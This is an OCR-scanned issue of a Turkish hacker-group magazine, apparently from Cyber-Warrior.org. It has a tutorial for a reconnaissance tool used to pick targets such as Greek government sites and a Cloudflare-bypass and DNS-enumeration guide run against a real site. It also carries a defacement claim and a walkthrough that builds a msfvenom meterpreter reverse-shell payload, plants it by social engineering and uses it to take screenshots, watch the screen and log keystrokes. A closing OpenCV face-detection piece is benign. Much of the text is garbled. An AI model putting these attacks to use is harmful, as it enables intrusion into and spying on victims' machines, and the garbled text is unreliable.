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“O da gazi olmak istedi, fakat ona anlatmak gerekti ki, şehid olmayı göze alamayan gazi olamazdı.” 
Arif Nihat Asya 





Merhabalar arkadaşlar. Uzun zaman oldu hiç bir yazı paylaşamadım. Affınız ola, hepiniz hakkınızı 
helal edin. Bugünkü konumuz kendim tarafından kodlanan bir yazılım olacaktır. İsmi CW İnterlist. 
Cİ (CW interlist) Hedef belirlemede fazla kolaylık sağlayan bir yazılımdır. Python dilinde 
yazılmıştır. Kullanılması da oldukca basitdir. 
kali kali: -/Desktop/projects/cwint 
File Actions Edit View Help 


-/Desktop/projects/cwint 
cwıint.py 


i 


Cyber-Warrlor.org | Lojistik grup 
Mikayil Ilyasov (OARAKURT ) 


parametreler ve detaylar icin -h kullaniniz 


“/Desktop/projects/cwint 





Parametrelere bir göz atalım 





Parametrelerimiz bunlar. Şimdi siz None leri boşverin harflara bakın. Yazılım içerisinde 
kullanacağınız parametreler bunlardır. 

Şimdi çalıştiralım. Ama ilk önce gerekli olan mödül ve kütüphaneleri bilgisayarınıza kurmanız için 
ilk önce /setup dizni içindeki setup.py dosyasını çalıştıralım. 


E seçimini seçerek Enter yapıyoruz ve kurulum başlıyor. Modüller kurulduktan sonra artık 
programımızı çalıştıra biliriz. 


kali(© kali: -/Desktop/projects/ewint/setup 


Vi İİ iii» 


kali(Gkali: -/D..projects/cwint 8 kali©kali: -/D...ts/cwint/setup & 


«/Desktop/projects/cwint 
cwint.py islemler.py 


-/Desktop/projects/cwint 
setup 


“/Desktop/projects/cwint/setup 
setup.py 


488.8... 48.454 855 5.85.5845 5 5 588.5. 

Yazilimda kullanilar modul ve kutuphaneler bilgisayarinizda kurulu olmaya bilir. 
bu yuzden setup.py dosyasi bu kurulumu sizin icin yapacaktir. 

Bu islemler Linux (Kali, Ubuntu, Debian) uzerinde denenmistir. 


İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ İİİ. 


Kurulumlari kurmaya hazirmisiniz? E/h : Ş 





Kullanılacak parametre seçenekleri aşağıdakı gibidir. 


-t / --targetz 

-d / --domainz 

-O / --OUtpUtZ 

-c / -command 

-k / --kelimez 

-S / --sayiz 

C parametresi ile kullanılan girdiler 
h / help 

i/info 


evet şimdi kullanıma keçelim 
“/Desktop/projects/cwint 


cwint.pY 1 





python3 cwint.py —c i ve ya python3 cwint.py —c info yine ve ya python3 cwint.py —commandsi 
yine de veya python3 cwint.py —commandinfo yazarak çalıştıra bilirsiniz. 


E seçimini seçerek Enter yapıyoruz ve kurulum başlıyor. Modüller kurulduktan sonra artık 
programımızı çalıştıra biliriz. 


kali(© kali: -/Desktop/projects/ewint/setup 


File Actions Edit View Help 


kali(©kali: -/D..projects/cwint 8 kali©kali: -/D...ts/cwint/setup © 


«/Desktop/projects/cwint 
cwint.py islemler.py 


-“/Desktop/projects/cwint 
setup 


“/Desktop/projects/cwint/setup 
setup.py 


488.8... 48455855 5.8558. 5 5 58.8 

Yazilimda kullanilar modul ve kutuphaneler bilgisayarinizda kurulu olmaya bilir. 
bu yuzden setup.py dosyasi bu kurulumu sizin icin yapacaktir. 

Bu islemler Linux (Kali, Ubuntu, Debian) uzerinde denenmistir. 

MAKAMA AAA AAA AAA AAA AAA AAA AAA AAA AA AAA AAA AAA 


TRAM be db ri lırraku bü bü b v4 ii 





Kullanılacak parametre seçenekleri aşağıdakı gibidir. 


-t / --target- 

-d / --domainz 

-O / --OUtpUt- 

-c / -command 

-k / --kelimez 

-S / --sayiz 

C parametresi ile kullanılan girdiler 
h / help 

i/info 


evet şimdi kullanıma keçelim 
“/Desktop/projects/cwint 


cwınt.DpY 1 





python3 cwint.py —c i ve ya python3 cwint.py —c info yine ve ya python3 cwint.py —commandsi 
yine de veya python3 cwint.py —commandinfo yazarak çalıştıra bilirsiniz. 
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vber Army 
Warrior.org icin kodlanmistir. Izinsiz kullanim 


Cyber-Warrlior.org | Turkish 
Bu yazilim tamamen Cyber 

ub kimi platformlarda paylasilmasi Yasakdir. 
https:// 
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GALATA v5” 


ww .cyber-warrlor.org/Misyon.asp 
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-/Desktop/projects/cwint 


Şimdide bir yardım sayfasına bakalım 


python3 cwint.py —c h ve ya python3 cwint.py —c help 


kali(kali: -/Desktop/projects/cwint 


File Actions Edit View Help 


-/Desktop/projects/cwint 


cwint.pY n 


Kullanim klavuru 


Bilgilendirme : 
Bu Komut gerek li 

Yardim al 

Yazilin 


python3 


bilgilendirmesi 


Kullanim ornegi: 

python3 cwınt. help da 
Yar pythor .DV —— omnandshelp 
Reverse ip : 


sonuna cerekli 


Kullanim ornegi 
python3i cwiınt.py 


python3 cwint.py 


Google detayli domain 


istedıgınız 


Kullanim ornegi 
python3 cwint.py 


ve ya python3 cwi main j 
google anahtar kelime ile tarama : 
T istedi 


aramak imen1 Eh 
mak istediıcıniz 


riske 


Alinan sonuclar sya gibi sakl 


Kullanim ornegi 


aıle hık” K Kalır warrior | | 01 ols 


Ve Yi python3 cwıint.py kelime- rrior| 
Önemli not: karsısında olan tum parametreler 


8858.08 8.8 5 58 85 8.8 8. 


parametreleri calistirmak icin kullanili 


ya python3 cwint.py -ch 


info ve ya python3 cwint.py 


adressini ekleyin /(-d cyber-war 


calisacaktir. Detayli inceleme 


www.cyber-warrior.org 


ve gith 


Respects to all Turkish and Azerbaijani hackers. 





CWBEST GÜNCEL BİLİM VE TEKNOLOJİ DERGİSİ 


python3 cwint.py —d ip/domain 


kali(© kali: -/Desktop/projects/cwint 


File Actions Edit View Help 


-/Desktop/projects/cwint 
cwınt.py bing.com 
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Cyber-Warrior.org | Lojistik grup 


Mikayil Ilyasov (OARAKURT ) 


parametreler ve detaylar icin -h kullaniniz 


vewa.w: bing.com 
<5: 13.107.21.200 


Cc 


Toplam domain: 5 


bing.com 

bing.com.polntdns.pro 
bıngstatıc.com 

g.msn.com 
server4.operamını.com.polntdns .pw 


-/Desktop/projects/cwint 


Programda bu özelliğe otomatik kayıtetme fonksiyonu da yazdım ve arama bitdikden sonra 
sonuçları. 


<cweimt - File Manager 


File Edit View Go Help 
<— “gn ln fhomejkali/Desktop/projects/cwint/ 


DEVICES 
| O File System ra 
m 
| <gen 
Desktop 


Trash ri 


Documenis 


—  pyemcie cwint.py 


islemler.py 
Music 
Pictures 
hilersie 
Dis'işiter teri 
NETWORK 
Lİ Browse Network 


Sitems:11.2 KiB(11,418 bytes), Free space: 63.6 GiB 





Google detaylı domain tarama 

Şimdi arkdaşlar nedir detaylı domain arama. Normalda hedef seçmek baya zaman alır. Siteleri 
bul, tarcüma et ki, bu ne sitesi. Örn devlet sitesi diye bir ticari kurumun sitesinde saatlerin gidiyor. İşte 
bu tam o sorunu çözmek için tasarlandı. Yani kısa sürede fazla sonuç almak gibi. İşin mantığı böyle. 
Hedef domaini örn “gov.gr” yaziyorsun, program sana gov.gr leri listeliyor ve karşısında ne sitesi 
olduğunu türkçe yazıyor. Tamam Tamam alkışa gerek yok :D 

Şimdi burada bir kaç parametre kullanacağız. 

python3 cwint.py -t gov.gr -s 5 -O Cw.tXİ 

burada 

-t (--target-) — adından da anlaşıldığı gibi hedef domain. 

-s (--sayiz) — almak istediğiniz sonuç sayısı. Yani 1 milyon tane sonuç istemiyorsanız 10 tane 
istiyorsanız bunu yazacaksınz 

-0 (--outputz) — çıktı almak için kullanırsız. Çıktı istemeseniz yazmaya gerek de yok 


python3 cwint.py —t hedef domain —s çıktı sayısı —o dosyayolu adı.txt 


kali) kali: -/Desktop/projects/ewint 


File Actions Edit View Help 


-/Desktop/projects/cwint 
çwınt.py gov.8r 3 


Cyber-Warrior.org Lojistik grup 
Mikayil Ilyasov (GARAKURT ) 


parametreler ve detaylar icin -h kullaniniz 


Arama baslatildi ! 
site:gov.gr 


(>) site : https://ww.apdattikis.gov.gı 
elat ME rrvir Merkezi Olmayan Attika İdaresi 
content : Merkezi Olmayan Attika İdaresi'nin yeni web sitesi, halkı derhal bilgilendirmeyi ve bilgilendirmeyi amaçlayan bir bilgi merkezi işlevi görüyo 


site : https: //brexit.gov.gr/ 
title : Brexit: Yunan Web Portalı 
>İ content : BREXIT ile ilgili tüm konular için Dışişleri Bakanlığı'nın resmi web sitesi. Vatandaşlar ve işletmeler için cevaplar. Sürekli güncellemeler. 


site : http://www .passport.gov.gr/ 
title : Pasaportların Adresi ve Güvenlik Belgeleri 
>) content : Pasaport ve Güvenlik Belgeleri Müdürlüğü, Yunanistan pasaportlarının düzenlenmesinin yanı sıra Ehliyet, Oturma izinleri, Polis Kimlik Kartlar 


, Yabancıların Seyahat Belgeleri (T.D.V) vb. 


-/Desktop/projects/cwint 





Gördüğünüz gibi hedef hakkında bilgileri Türkçe ekrana yazdırmaktadır. 

Google anahtar kelime ile tarama 

Evet arkadaşlar burada da yazdığınız kelimeyle ilgili url taraması yapar 

-k (--kelimez) — anahtar kelimeniz 

-s (--sayiz) — almak istediğiniz sonuç sayısı. Yani 1 milyon tane sonuç istemiyorsanız 10 tane 
istiyorsanız bunu yazacaksınz 

-o (--outputz) — çıktı almak için kullanırsız. Çıktı istemeseniz yazmaya gerek de yok 


python3 cwint.py —k kelimeniz —s çıktı sayısı —o dosyayolu adı.txt 


kali(& kali: -/Desktop/projects/cwint 
File Actions Edit View Help 


-/Desktop/projects/cwint 
çwınt.py pkk 10 


Cyber-Warrlor.org Menbüi grup 


Mikayil Ilyasov ( OARAKURT ) 


parametreler ve detaylar icin -h kullaniniz 


https://www .atlanticcouncil.org/blogs/menasource/the-ypg-pkk-connection/ 

https://www .crisisgroup.org/content/turkeys-pkk-conflict-visual-explainer 
https://ww.CrİSsİisgroup.org/middle-east-north-africa/eastern-mediterranean/syria/us-joins-turkey-pkk-fight-northern-syria 
https://www .youtube.com/watch?v-myyZ5Cdc1-Y 

https: //jJournals.openedition.org/ejts/4615 

https://www .ft.com/content/dd2c9d8c-ec74-11e1-8e4a-00144feab49a 

https://www .trtworld.com/magazine/are-pkk-linked-terrorists-fighting-alongside-armenia-in-occupied-karabakh-40201 
https://fas.org/irp/world/para/docs/studies3.htm 

https://www .aljazeera.com/news/2020/8/13/turkey-says-operation-against-pkk-in-irag-to-continue 

https://www .al-monitor.com/pulse/originals/2020/10/sinjar-resistance-units-ybs-irag-yazidis-pkk-turkey.html 
Tarama bitdi... 


“/Desktop/projects/cwint 





Evet arkadaşlar ayrıca isterseniz —o parametresi ile çıktı ala bilirsiniz. 
Saygılarla 
OARAKURT 


Cloudflare internet güvenliği, ddos, alan adı ve su- 
nucu alanlarında hizmet veren bir sistemdir. Sitenizi 
güvenli ve hızlı bir şekilde yayınlamanızı sağlayan ve 
siber saldırılara karşı etkili bir servistir. 


Get started with Cloudflare 


Email 





eate Account, | agree to Cloudflare's terms, privacy policy, and cookie policy 


Create Account 


Already have an account? Log in 


Cloudflare Sisteminden Faydalanmak İsterseniz Bu- 
radan Görüntüleyebilirsiniz 

Siteye üye olup kullanmak istediğiniz ürünü seçme- 
niz yeterli olacaktır. 

Siteniz için seçtiğiniz ürünün ardından Cloudflare ta- 
rafından size sunulan DNS”leri sitenizin “'DNS”leri 
ile değiştirmeniz gerekmektedir. Bu işlemleri tamam - 
ladıktan sonra siteniz koruma altına giriyor ve seçmiş 
olduğunuz ürün aktif hale geliyor. 





www.cyber-warrior.org 





Without CloudFlare With CloudFlare 


Visitors Visitors 


2 — 5 

| LE v — > 
Crawlers Your naked Crawlers CloudFlare 
and bots website and bots protected website 





Attackers Attackers 


Sitenizi DOS-DDOS saldırılarından korur. Siteniz 
yavaşlasa bile Cloudflare önbelleğe alınmış dosyaları 
sunar ayrıca ücretsiz SSL sertifikası verir. 





# Temel kullanıcılara ücretsizdir ve kurulumu basit- 


tir. 

# IP adresinizi gizler bu sebepten dolayı saldırı yap- 
maya çalışan hacker ın sunucuya sızması zorlaşır. 

# Sahte kullanıcı erişimini engeller ve böylece siteni - 









Keki isemeli) fesi İİİ deleNiNeisfelii 


zin kaynakları kaydedilip sitenizin hızı artırılır. 


Cloudflare Sistem Bypass Etme Yöntemleri 


İlk önce yapmamız gereken sistemi analiz etmek 
google eklentisi olan Wappalyzer aracını kullanarak 
sistemimizi inceleyeğiz. Wappalyzer i Linkinden 
mağazada arama yap kısmına Wappalyzer yazarak 
google chrome eklentisi haline getirebilirsiniz. 


© Wappalyzer 


Website & contact lists 


Widget Pazarlama Otomasyonu 
Ki Facebook PA Adobe Target 220 
Analitik Etiket Yöneticisi 


,gi Google Analytics 


Pat Adobe Experience 


Platform Identity Service 


© Google Tag Manager 
A) Adobe Experience 


Platform Launch 


EB Adobe Analytics 


Moat JavaScript Kütüphaneleri 


çe jOuery 132 
JavaScript Framework gi Modemizr 262 


© ReguireJs 206 Underscore.js 


CDN 


#. Cloudflare 





şb Create an alert for this website vw © 


Yukarda gördüğünüz gibi hedef sitemiz cloudflare 
sistemini kullanıyor. Şimdi yapmamız gereken hedef 
sistemimizin IP adresini öğrenmek. 

Ping 


Komut İstemi 





Yukarıda bize sitenin IP adresini 207.231.x.x bul- 


du fakat sitenin ip adresi gerçekten 207.231.x.x mi? 
Yukarda belirtmiştim cloudflare sisteminden ürün 


alan admine ait sitenin ip adresi cloudflare sisteminin 


siteye atamış olduğu ip adresi peki hedef sistemimi- 


zin gerçek ip adresini nasıl buluruz? 


http://wWww.crimeflare.org:82/cfs.html Siteye girip 
bypass etmek istediğimiz hedefi yazıyoruz. 


Some domains that recentiy used CloudFlare 


In our zip files, if the direct-connect lookup failed, the domain is not shown with an IP address 
and country, but is saved with its two CloudFlare nameservers and rechecked the next time 
around. The current direct-connect count is 2,616,885. Our data is cumulatively updated every 
three weeks. Here is a 27.A49MB zip file of the domains with IP addresses that you can download 
and unzip. By scanning this file for specific IP addresses or netblocks, researchers sometimes 
discover clues about who is hiding behind CloudFlare. 


IP addresses may be current, or they may have been current as long ago as 
August 2012. Enter a domain in the search box below to see our IP address 
lookups. If the direct-connect fetch done by the search below is 
unsuccesstful or inconclusive, this means that further research is needed to 
discover whether an IP address is still valid. 


A second 12.70MB zip file lists all domains in our database, sorted by paired 
nameservers. Researchers use this to find additional domains on a single 
CloudFlare account, thereby developing more clues. A specific pair of 
nameservers yields a maximum of a few hundred domains from this list, 
making it possible to scan manually. 
Lets dumb down the earihlings by 


feeding them more advertising. 
Support CloudFlare! 





yu, or if you know of a domain that uses CloudFlare but is not listed, enter that domain in the s 
ddress can be found. If so, a final test will try to fetch a page from that address. If that works, i 


Enter a domain: 
| https://www.web | | Search| 











Arama yaptıktan sonra gelen sonuç aşağıdaki gibidir; 


Data for webmd.com 


amir.ns.cloudflare.com 


vita.ns.cloudflare.com Cloudflare olmayan ip adresi 


nameserver search: amir vita 


A direct-connect IP address was foundiiweb O.com1/0.158 O UNİTED SIATES 


An attempt to fetch a page from this IP was unsuccesstful. 


SSL certificate info for webmd.com 








Previous lookups for this domain: 


» 2020-12-13: web O.com 207.231 
» 2020-06-08: web O.com 170.138 


UNITED STATES 
UNITED STATES 


İlk sefer sitemize ping attığımızda 207.231.x.x ver- 
mişti, bu IP adresi cloudflare sistemine ait bir ip 
adresi olduğunu düşünmüştük fakat crimeflare site- 
mizde kontrol ettikten sonrasında bize 170.138.x.x 
ip adresini yani siteye ait gerçek ip adresini vermiş 
bulundu ve sistemi bypass ettik. 


NMAP 
Aşağıda verdiğim kod siteye ait bütün subdomainleri 
(alt alan adlarını) ve IP adreslerini verir. 


nmap --script dns-brute -sn hedefsite.com 





www.cyber-warrior.org 


kali 
dnsmap web .com 
dnsmap 0.35 —- DNS Network Mapper 


nmap —script dns-brute -sn we Mefolıi 
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 16:11 EST 
Nmap scan report for webmd.com (207.231.204.56) 


Host is up (0.37s 


latency). 


Host script results: 


dns-brute: 

İ DNS Brute 
ads.web 
ads .web 
test.we 
test.we 
images. 
images. 
test.we 
test.we 
news .we 
eb e -Toğ 
ns1.web 
ns2.web 
apps.we 
lab.web 
ns3.web 
local.w 
beta.we 
mail.we 
exchang 
blog.we 
wa .web 
ww 2 .we 
Wa 2. we 
ftp.web 
smtp.we 
demo.we 





DNSENUM 


:e hostnames: 
li > 
ll EV 
Bi © li KP 
:om —- 104.18. 
İN e e ll KK 
i.com —- 104.1 
:om — 2606:47 
:om — 2606:47 
Bolu A YAMACI 
Me yi ai 
ım — 204.250. 
ım — 63.240.8 
:om —- 98.158. 
ım — 170.138. 
ii 
com - 207.23 
:om — 207.231 
:om — 207.15. 
»ımd.com — 207 
Ye iğ vi Vgriemi 
il Xİ 
:om — 104.18. 
BE © li KP 
M4— 207.231 
e beri eri 
:om — 208.237 


Hedef sistemin nameserver, mailserver ların dns 


adreslerini ve IP adreslerini bulur. 


kali 


dnsenum web .com 


dnsenum VERSION:1.2.6 


—— webmd.com —— 


Mei KoliTek ii: $ etol 
Mol WeliTeh ib -Eefolii 
.Cloudflare.com. 
.Cloudflare.com. 
Mei KoliTek ib etol 
Mel KoliTek Mi: $ etol 


alt2.aspmx.l.google. 
alt4.aspmx.lI.google. 
alt3.aspmx.lI.google. 
altı.aspmx.l.google. 
aspmx.I.google.com. 


DNSMAP 


b rr 
74.125.1 
74.125.2 
142.250. 
108.177. 


Tüm DNS haritasını ve ait IP adreslerini ortaya çıkar- 


tır. 


(* 
(4 


tefetolilık e ea 0) 
IP address #1: 
IP address #2: 


af.wek .com 
IP address #1: 


as.web .com 


IPv6 address #1: 
IPv6 address #2: 


as.weft com 
IP address #1: 
IP address #2: 


| o 77) eğ ofoli; 
IP address #1: 


beta.wek .com 
IP address #1: 


bi.web .com 
IP address #1: 


blog.web .com 
IP address #1: 


. com 


104.18.31. 
104.18.30. 


.231.204. 


104.18.31. 
104.18.30. 


205.216.15. 


207.231.204. 


23.214.7. 


207.231.204. 


NSLOOKUP 
Sitenin mail sunucusunun subdomainini bulduktan 
sonra bulduğu subdomaine ping atarak gerçek IP 

adresi öğrenilir. 


nslookup -gxmx hedefsite.com 


Ping Subdomain 


kali 
ki eTel dile 
Server: 
Address: 


ele klib Gi (-İ e MT ef olu! 


1 A Ke > 
192.168.1.1#53 


Non-authoritative answer: 


web .com 
web .com 
web ..com 
web .com 
wek .com 


mail exchanger 
mail exchanger 
mail exchanger 
mail exchanger 
mail exchanger 


J searching (sub)domains for webmd.com using built-in wordlist 
) using maximum random delay of 10 millisecond(s) between reguests 


2606:4700 ::6812:1f6d 
2606:4700::6812:1e6d 


10 4.aspmx.I.google.com. 
10 .3.aspmx.l.google.com. 
5 i.aspmx.I.google.com. 
5 '2.aspmx.l.google.com. 
1 aspmx.I.google.com. 


Authoritative answers can be found from: 


kali 
ping 


.aspmx.I.google.com. 
PING alt4.aspmx.l.google.com (74.125.137. ! 56(84) bytes of data. 


DNSDUMPSTER 


Buradan sitesiye giderek aramak istediğiniz siteyi 
search ederek site hakkında detaylı bilgi toplayabilir- 


siniz. 
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izl aMelil meli İNİ Ri id lelkeNiNe -izielisi 


DAKP- köpekler lt Devrimci Komunara 
Partisi ve propaganda siteler Özgürlük Güçleri 
Kızıl Elma Tim tarafından ele geçirilmiştir. 


Yaşasın Devlet, Var Olsun AKINCILAR! 


ŞU kopan fırlına ' “ ordusudur yâ Kabbi, 


Tâ ki yükselsin ezanlarla müeyyed nâmın, 


Ihat torn slorm is İhe (army. va Rabbi, 


Let it rise, prayer and prayer, 
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Login 
KARAR AK 
Password 
KEKE 





BACKDOOR 


düşürüp kötü amaçlarla kullanılmak için ha- #Kullandığımız sistemde kesinlikle antivirüs progamı 
zırlanmış casus yazılımlardır. olmak zorunda. 

#Kullanılan antivirüs programının belli zaman ara- 
lıklarıyla güncellenmesi gerekmektedir. 

#Şüpheli e-posta sms veya özel konuşmalarda gönde- 
rilen dosyaları indirmemek indirilmesi gerekiyor ise 
sanal bir makine kurulmalıdır. 


B ackdoor virüsü bilgisayar kullanıcılarını ağına (NASIL KORUNURUZ? 


BACKDOOR OLUŞTURMA UYGULAMASI 

Hedef sistemimiz WİNDOWS7 hedefimize sosyal 
mühendislik yolları ile herhangi bir sms e-posta veya 
özel konuşma programlarından virüsümüzü yaptı 

| attık ve indirmiş olarak kabul edelim. 

Ay Virüsü oluşturma ve sisteme erişme evresini alan 
alan inceleyelim. 


NN Z 





NE AMAÇLA KULLANILIR? 


Bir backdoor hazırlayan hacker; 

#Hedef sistemin içerisine girip kayıtlar kullanıcının 
kamerasını kullanıcının ekranını klavye de bastığı 
tuşlar ekran resmi alma ve erişim sağlamış olduğu 
sistemi istediği gibi yönetebilir. 





IN hisli gum | a) Ul | N K | ii VE m UN m | | 


İ ! m mi m a 
YO tali, NILIMI VE ERTMILLA Pl lmişitipe| 


VİRÜS DOSYASINI OLUŞTURMAK 


ShellNo.1 


File Actions Edit View Help 


kali 
#msfvenom -p windows/meterpreter/reverse tcp LHOST-192.168.1.108 LPORT-4444 —-f exe -o /r 

oot/Desktop/root.exe 
(-1 No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
(-1 No arch selected, selecting arch: x86 from the payload 
No encoder specified, outputting raw payload 
Payload size: 354 bytes 
Final size of exe file: 73802 bytes 
Saved as: /root/Desktop/root.exe 

kali yi 





Görülüdüğü üzere virüs dosyamızı oluşturduk ve 
masaüstüne kaydettik. 


METASPLOİT EKRANINI AÇMAK VE İŞLEMLERİ 
YAPMAK 

msfconsole yazarak metasploit ekranımıza gidiyoruz 
ve exploitimizi girerek oluşturduğumuz virüs dosya- 
sını hedef kullanıcı sisteme indirdiği zaman erişim 
sağlayabilmemiz için exploit kullanmamız gerekmek- 
tedir. Doğru exploiti girdikten sonra virüs dosyasını 
hazırlarken kullandığımız payloadı burda tekrar 
kullanıyoruz. 


Shell No. 2 


File Actions Edit View Help 


Shell No. 1 Shell No. 2 


000 


z t ılolt .0.18— 

-| 2081 exploits — 1124 auxiliary - 352 post 
—-| 592 payloads - 45 encoders - 10 nops 
—-| 7 evasion 


Metasploit tip: Adapter names can be used for IP params 
set LHOSTI eth0 


sf6 > use exploit/multi/handler 
Usıng contigureda payloaa generic /shell 
msf6 exploit( ) > set PAYLOAD windows/meterpreter/reverse tcp 
PAYLOAD > windows/meterpreter/reverse LLp 
msf6 exploit( ie 





diyerek exploitimizin bizden istediği 
özellikleri görüp ve istenilen özellikleri yazmamız 
gerekmektedir. 


Shell No. 2 
File Actions Edit View Help 


Shell No. 1 Xx Shell No. 2 


Name Current Setting Reguired Description 


Payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Reguired Description 
EXITFUNC process yes 
LHOST 
LPORT 


Exit technigue (Accepted: '', seh, thread, process, n 


The listen address (an interface may be specified) 


4k The listen port 


Exploit target: 


Id Name 


O Wildcard Target 


msf6 exploit ) >iset LHOSTS 192.168.1.108 
LHOSTS > 192.168.1.108 


msf6 exploit( e | 





Exploitimiz bizden LHOST yani kendi ip adresimizi 
istiyor.İşlemimizi tamamladıktan sonra run veya exp- 
loit diyerek bağlantı kuruyoruz.Sosyal mühendislik 
yöntemleri ile hedef sistemin dosyamızın indirdiğini 
kabul ediyoruz indirdiği için meterpreter ekranımız 
geliyor yani sisteme erişim sağladık. 


Shell No.2 
File Actions Edit View Help 


Stdapi: User interface Commands 


el rlala Description 
enumdesktops 
ei eli gele) 
idletime 
keyboard send 
keyevent 
keyscan dump 
keyscan start 
keyscan stop 
mouse 
screenshare 
eğ -i-iebişTohu 
setdesktop 
uictl 


List all accessible desktops and window stations 
Get the current meterpreter desktop 

Returns the number of seconds the remote user has been idle 
Send keystrokes 

Send key events 

Dump the keystroke buffer 

Start capturing keystrokes 

Stop capturing keystrokes 

Send mouse events 

Watch the remote user desktop in real time 

Grab a screenshot of the interactive desktop 
Change the meterpreters current desktop 

Control some of the user interface components 





Bulunduğumuz meterpreter ekranına 

help yazarak hedef sisteme hangi komut ile ne yapa- 
biliriz bize göstermektedir.Birçok komut olduğu için 
hepsini anlatamam ama hoşunuza gidecek eğlenceli 
kısımlara bakalım. 


Bu komut hedef kullanıcının sisteminde 
bulunduğu konumu ekran resmini alır ve bizde kay- 
deder. screenshot hedef sistemde bulunulan kısmın 
ekran resmini alıyoruz. 


meterpreter > screenshot 
Screenshot saved to: /roo0t/BjETALZo.jpeg 


meterpreter > 





Daha sonrasında kaydedilen yere gidip fotoğratımıza 


bakalım. 





7 )LOJİSTİK DEŞTEK 


VHERLER 
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Bu komut hedef sistemin birebir ne 
yaptığını izlememize yaramaktadır.Meterpreter 
ekranımıza screenshare yazarak hedefi canlı olarak 
izlemeye tarayıcımıza gelen ekranda izliyoruz. 
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<—S5— cCc 0 VU Bi hitpsy/Ywww.cyber-warrior.org/246961/ EB Di vin od © — 


a a e İN 














Leop4rD 

Root | Forum > LeopârD 

Kullanıcı Adı Leop4rD 

Albay 

ie AAA 
(a) o (a) oyver e e ğa 
Organizasyon Akincilar 
Ünvan Moderator 
Uzmanlık Alanları 

z ni : 

Aktif Operasyonel TIM Kızılelma, Trial Mode, 
Lokasyon ÖTÜKEN 
E-mail Özel . 


Ekranı birebir video halinde burda paylaşayamıcağım 
için ekran resmi aldım ama ben ne yaptığını gördüm 

eLeop4rD hocamın profilini inceleyip konuları hak- 

kında araştırma yapıyordu :) 


mouse: Hedef kullanıcının mousesini terminalden 
yönetmeye yarayan komuttur.Meterpreter ekranına 
mouse: yazarak çalıştırırız ve çıkan komutlar ile 
mouseyı kendi kontrolümüz altına alırız. 


lek, up, down, riehtelick, rightup, rishtdown, do 
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1101110000010100011000 
1101110000010100011000 


1101110000010100011000 
1101110000010100011000 
1101110000010100011000 
1101110000010100011000 








OpenCV ? 


OpenCV görünt işlemede kullanılan açık kaynak 
kodlu bir kütüphanedir. Viola-Jones algoritmasından 
ftaydalanmaktadır. 


Biz de Viola-Jones algoritmasını inceleyeceğiz 





Viola-Jones algoritması 2 adımdan oluşuyor eğitim 
ve tanıma. 

İlk önce algoritma eğitiliyor sonra tanıyor. 

Biz önce tanıma adımını öğreneceğiz. Çünkü tanıma 
adımını öğrendiğimizde eğitim işi daha kolay oluyor 
mantığını daha çabuk anlayabiliyoruz. 





Algoritmanın doğru çalışabilmesi için yüzün önden 
gözükmesi gerekiyor. 


Yandan çekimlerde zorlanıyor, bulamayabiliyor 


Viola-Jones algoritmasının ilk yaptığı işlem resmi 
LADIM:T 
ani siyah-beyaza çeviriyor. Böylelikle daha kolay işlem 
yapabiliyoruz. Siyah beyaz resimde işlem yapacağız 
fakat renkli resime uygulayacağız. Sonuçta resim aynı 


MN 


Bu fotoğraf üstünde çalışacağız 


koordinatlar aynı herşey aynı sadece renkler farklı. 
gri resimde yüzü bulup renkli resimde aynı koordi- 
natları belirteceğiz. Biz bunları farketmeyeceğiz her 
şey arka planda gerçekleşiyor. 


Sonrasında Viola-Jones algoritması resmin sol üst 
köşesine bir kare yerleştirir ve adım adım kayarak 
yüzdeki belli özellikleri arar. kaş göz burun ağız gibi 
özellikler. Yüz özelliklerini nasıl tespit ettiğini biraz- 
dan anlatacağım... 





Gördüğünüz gibi kareyi adım adım kaydırarak içinde 
yüz özelliklerini arıyor. Önce bir göz buluyor. Fakat 
bu bir yüz olması için yeterli değil. Bunu kaydetmi- 
yor. Daha sonrasında tekrar yana kayarak 2 gözü 
buluyor. Bunu algoritmada ayarlayabiliyoruz. Eğer 
tek özellik bulsa bile burada yüz vardır dedirtebiliriz. 
Fakat bu hata oranını arttırır.. sonuçta kaş dediğimiz 
kalın, siyah bir çizgi. etrafımızda bolca siyah çizgi var 
:) Algoritma kare kare fotoğrafı tarıyor ve yüz arıyor. 
Bulduğu zaman ise burada yüz var diye işaretliyor. 
Fakat gerçekte bu kadar büyük kare olmuyor. Çok 
daha küçük kareler ile fotoğrafı tarıyor. Ben daha iyi 
anlamanız için büyük gösterdim. 


Eğer tarama sonunda üst üste kareler bir noktada 
kümelendiyse orada yüz var diyebiliriz. Biz bunu kod 
kısmında halledeceğiz. Mesela diyeceğizki görüntüde 
en az 5 kare üst üste gelmeli yüz bulmalı ki burayı 
işaretleyesin. Örnek olarak üstteki resimde 2 defa 
buldu. Telefon kameranızı açtığınızda da yüzünüzde 
kare oluştuğunu farketmişsidir. Onlarda bu algorit- 
mayı kullanıyor. 


Pixiz. 


id yeidgamaka Miyinmeaianenas 
Li LİLA VE biz T | ji sigeli 
Mi di ile göre men ge en in sile m ğe 
ST A Aİ pe Eş ei lik oi 


HAAR LİKE 


Viola-Jones algoritması Haar-like özelliklerini kulla- 
nıyor. Haar-like sayesinde özellikleri belirliyoruz. 


iğ 


Kenar Özellikler Çizgi Özellikler Dört-Kare Özellikler 


Kenar özellikleri, çizgi özellikleri, dört kare özellikle- 
ği 
Tüm bu özellikler piksellerden oluşuyor. 


Mesela resmin bir bölümünde solundaki pikseller be- 
yaz sağındaki pikseller siyah olabilir. işte biz oradaki 
durumda kenar özelliği var diyoruz veya orta kısmı 
karanlık yanları açık olan bölümlerde ise çizgi özelli- 
ği var diyoruz 

bu özellikleri büyütüp küçültebiliyoruz. Yani 300x300 
piksellik bir alanda da karşımıza çıkabilir. 50x50 pik- 
sellik alanda da çıkabilir. Bu özelliklerin örneklerini 
yine üstteki fotoğrafta arayacağız. 





Gördüğünüz gibi Haar-like özelliklerini resimde 
buldu. Tabi bunlar arttırılabilir. bunları örnek olarak 
gösterdim. 

Resimi siyah beyaza çevirmemizin bir avantajı da bu. 
sadece 2 renk üzerinde çalışıyoruz siyah ve beyaz. 
Renkli resimler üzerinde çalışsaydık çok eziyetli 
olurdu. 


Şimdi bu özellikleri piksel olarak inceleyelim; 


pd 


ei elil e İM ii dlelMeNiğelslelii 


sjalslrlalelalalale 
ejelolelolelelılmja 


zlelelelelmlelelele 
slalalalalsielelsie 
elslolafalalılelalı 





Kaşı daha detaylı inceleyelim. 
